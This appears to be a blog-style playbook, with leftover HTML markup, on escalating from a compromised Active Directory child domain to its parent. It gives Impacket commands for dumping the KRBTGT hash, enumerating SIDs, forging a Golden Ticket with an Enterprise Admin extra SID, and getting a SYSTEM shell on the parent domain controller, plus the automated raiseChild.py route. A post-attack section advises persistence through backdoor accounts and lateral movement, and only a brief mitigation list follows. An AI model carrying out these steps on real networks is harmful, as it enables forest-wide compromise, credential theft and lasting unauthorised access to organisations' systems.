This playbook provides a detailed, step-by-step guide to escalating privileges from a compromised child domain to a parent domain in an Active Directory (AD) environment. Each step includes explanations, tool usage, and notes to improve comprehension and enhance understanding.<\/p>\n\n\n\n
Active Directory (AD) environments often have trust relationships between domains. A child-to-parent domain trust allows users in the child domain to access resources in the parent domain. Attackers can exploit these trust relationships to escalate privileges and compromise the parent domain. This playbook focuses on leveraging Kerberos ticket forgery (Golden Ticket attacks) to achieve this.<\/p>\n\n\n\n
To perform the attack, you need specific information about the child and parent domains. This data is essential for crafting a Golden Ticket.<\/p>\n\n\n\n
secretsdump.py <CHILD_DOMAIN>\/<ADMIN_USER>@<CHILD_DC_IP><\/code><\/pre>\n\n\n\n\n- Explanation<\/strong>:\n
\n- This tool simulates a Domain Controller (DC) replication request using the DRSUAPI protocol.<\/li>\n\n\n\n
- It extracts sensitive information, including NTLM hashes for user accounts.<\/li>\n<\/ul>\n<\/li>\n\n\n\n
- Output Example<\/strong>:<\/li>\n<\/ul>\n\n\n\n
\nkrbtgt:502:aad3b435b51404eeadeadbeef51404ee:9d765b482771505deadbeef065964d5f<\/p>\n<\/blockquote>\n\n\n\n
Tool 2: lookupsid.py (Impacket)<\/strong><\/h3>\n\n\n\n\n- Purpose<\/strong>: Enumerate SIDs for users, groups, and domains by brute-forcing them.<\/li>\n\n\n\n
- Command<\/strong>:<\/li>\n<\/ul>\n\n\n\n
lookupsid.py <CHILD_DOMAIN>\/<USER>@<CHILD_DC_IP><\/code><\/pre>\n\n\n\n\n- Explanation<\/strong>:\n
\n- This tool queries the Local Security Authority (LSA) service on a DC to enumerate SIDs.<\/li>\n\n\n\n
- The output includes the domain SID and RID mappings for users\/groups.<\/li>\n<\/ul>\n<\/li>\n\n\n\n
- Output Example<\/strong>:<\/li>\n<\/ul>\n\n\n\n
\nDomain SID is: S-1-5-21-2deadbeef9-209893948-9deadbeef<\/p>\n<\/blockquote>\n\n\n\n
Notes:<\/strong><\/p>\n\n\n\n\n- The KRBTGT hash is critical for forging Kerberos tickets.<\/li>\n\n\n\n
- The Enterprise Admin SID is needed to escalate privileges into the parent domain.<\/li>\n<\/ul>\n\n\n\n
Step 2: Constructing a Golden Ticket<\/strong><\/h2>\n\n\n\nA Golden Ticket is a forged Kerberos ticket that allows you to impersonate any user in a domain. In this attack, you will forge a ticket with elevated privileges in both domains.<\/p>\n\n\n\n
Tool: ticketer.py (Impacket)<\/strong><\/h3>\n\n\n\n\n- Purpose<\/strong>: Generate a Golden Ticket using the collected information.<\/li>\n\n\n\n
- Command<\/strong>:<\/li>\n<\/ul>\n\n\n\n
ticketer.py -nthash <KRBTGT_HASH> -domain-sid <CHILD_DOMAIN_SID> \\-domain<CHILD_DOMAIN_FQDN> -extra-sid <ENTERPRISE_ADMIN_SID> \\-spn krbtgt\/<PARENT_DOMAIN_FQDN> <FAKE_USERNAME><\/code><\/pre>\n\n\n\n\n- Explanation<\/strong>:\n
\n- -nthash: Specifies the NTLM hash of the KRBTGT account.<\/li>\n\n\n\n
- -domain-sid: Adds the SID of the child domain.<\/li>\n\n\n\n
- -extra-sid: Adds the SID of the parent domain\u2019s Enterprise Admins group.<\/li>\n\n\n\n
- -spn: Service Principal Name for Kerberos authentication in the parent domain.<\/li>\n\n\n\n
- <FAKE_USERNAME>: A placeholder username (e.g., \u201chacker\u201d).<\/li>\n<\/ul>\n<\/li>\n\n\n\n
- Output<\/strong>:\n
\n- A\u00a0.ccache\u00a0file containing your forged Kerberos ticket.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
Notes:<\/strong><\/p>\n\n\n\n\n- The extra SID allows you to escalate privileges into the parent domain by impersonating an Enterprise Admin.<\/li>\n<\/ul>\n\n\n\n
Step 3: Using the Golden Ticket<\/strong><\/h2>\n\n\n\nOnce you have created your Golden Ticket, you can use it to authenticate against resources in both domains.<\/p>\n\n\n\n
Steps:<\/strong><\/p>\n\n\n\n\n- Set up your environment to use the forged Kerberos ticket:<\/li>\n<\/ol>\n\n\n\n
export KRB5CCNAME=<TICKET_FILENAME>.ccache<\/code><\/pre>\n\n\n\nThis tells your system to use this ticket for Kerberos authentication.<\/p>\n\n\n\n
\n- Authenticate to a parent domain controller using Impacket\u2019s\u00a0psexec.py:<\/li>\n<\/ol>\n\n\n\n
psexec.py <CHILD_DOMAIN_FQDN>\/<FAKE_USERNAME>@<PARENT_DC_HOSTNAME> -k -no-pass<\/code><\/pre>\n\n\n\nIf successful, this provides a SYSTEM-level shell on the parent DC.<\/p>\n\n\n\n
Notes:<\/strong><\/p>\n\n\n\n\n- Ensure that your\u00a0.ccache\u00a0file is correctly generated otherwise, authentication will fail.<\/li>\n\n\n\n
- Use tools like\u00a0klist\u00a0to verify that your Kerberos ticket is loaded correctly.<\/li>\n<\/ul>\n\n\n\n
Step 4: Automating with raiseChild.py<\/strong><\/h2>\n\n\n\nFor an automated approach, Impacket\u2019s raiseChild.py simplifies many steps by combining enumeration, ticket creation, and exploitation into one process.<\/p>\n\n\n\n
Command Example:<\/strong><\/p>\n\n\n\nraiseChild.py -target-exec <PARENT_DC_IP> <CHILD_DOMAIN_FQDN>\/<ADMIN_USER>:<PASSWORD><\/code><\/pre>\n\n\n\nWorkflow of raiseChild.py:<\/strong><\/p>\n\n\n\n\n- Enumerates child and parent domains\u2019 FQDNs.<\/li>\n\n\n\n
- Retrieves SIDs for both domains.<\/li>\n\n\n\n
- Extracts KRBTGT credentials from the child domain.<\/li>\n\n\n\n
- Creates a Golden Ticket with elevated privileges for both domains.<\/li>\n\n\n\n
- Authenticates into the parent DC using PsExec.<\/li>\n<\/ol>\n\n\n\n
Notes:<\/strong><\/p>\n\n\n\n\n- While convenient, automated tools like\u00a0raiseChild.py\u00a0may fail or cause unintended side effects in production environments. Always understand and validate each step manually before relying on automation.<\/li>\n<\/ul>\n\n\n\n
Post-Attack Activities<\/strong><\/h2>\n\n\n\nOnce access to the parent domain is achieved:<\/p>\n\n\n\n
\n- Use tools like BloodHound or PowerView to enumerate sensitive resources and identify additional attack paths.<\/li>\n\n\n\n
- Establish persistence by creating backdoor accounts or modifying group memberships.<\/li>\n\n\n\n
- Perform lateral movement across critical systems using tools like PsExec or RDP.<\/li>\n<\/ol>\n\n\n\n
Mitigation Strategies<\/strong><\/h2>\n\n\n\nTo prevent such attacks:<\/p>\n\n\n\n
\n- Regularly rotate KRBTGT account passwords using Microsoft\u2019s recommended two-step process.<\/li>\n\n\n\n
- Enable SID filtering on inter-domain trusts to block unauthorised SID usage.<\/li>\n\n\n\n
- Monitor for unusual Kerberos activity, such as long-lived tickets or excessive TGS requests.<\/li>\n\n\n\n
- Implement Privileged Access Management (PAM) solutions to restrict administrative access.<\/li>\n\n\n\n
- Deploy advanced detection tools like Microsoft Defender for Identity or SIEM solutions.<\/li>\n<\/ol>\n\n\n\n
Additional Resources<\/strong><\/h2>\n\n\n\n\n- Active Directory Exploitation Cheat Sheet<\/a><\/li>\n\n\n\n
- The Hacker Recipes – Trusts<\/a><\/li>\n\n\n\n
- ADSecurity Blog – Kerberos Golden Tickets<\/a><\/li>\n\n\n\n
- MITRE ATT&CK Framework – Domain Trust Discovery<\/a><\/li>\n<\/ol>\n\n\n\n
Final Notes<\/strong><\/h2>\n\n\n\nUnderstanding each step of this process is critical for both offensive security professionals and defenders. While tools like raiseChild.py provide automation, performing these steps manually ensures better understanding and troubleshooting capabilities during engagements or real-world scenarios.<\/p>\n\n\n\n